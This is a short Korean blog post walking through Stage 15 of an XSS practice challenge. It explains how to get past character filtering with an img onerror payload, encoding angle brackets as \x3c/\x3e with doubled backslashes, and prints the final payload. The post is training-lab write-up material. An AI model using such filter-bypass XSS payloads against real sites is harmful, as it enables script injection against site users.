Notice
Recent Posts
Recent Comments
Link
«   2025/07   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30 31
Tags
more
Archives
Today
Total
관리 메뉴

Study

Stage #15 본문

웹 보안/XSS Challenges

Stage #15

^_^? 2020. 11. 30. 14:03

Stage 15

What you have to do:
Inject the following JavaScript command: 
alert(document.domain);

 

다음과 같이 특수문자가 필터링 된다

 

 

 

) img태그 이용하고

 

<img src=1 onerror=alert(document.domain)>

 

<,> \x3c, \x3e 이렇게 바꿔주면 된다

 

\x3cimg src=1 onerror=alert(document.domain)\x3e

 

하지만 위와 같이 입력하면 \이 제거되므로

최종 공격 코드는 다음과 같다

 

\\x3cimg src=1 onerror=alert(document.domain)\\x3e

'웹 보안 > XSS Challenges' 카테고리의 다른 글

Stage #19  (0) 2020.11.30
Stage #12  (0) 2020.11.30
Stage #10  (0) 2020.11.27
Stage #9  (0) 2020.11.27
Stage #8  (0) 2020.11.27